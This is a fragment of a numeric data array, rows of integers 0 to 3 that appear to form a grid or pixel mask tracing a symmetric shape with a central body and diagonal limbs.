[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 1, 1, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 1, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 2, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 2, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 0, 0, 0, 0, 0, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 0, 0, 0, 0, 0, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
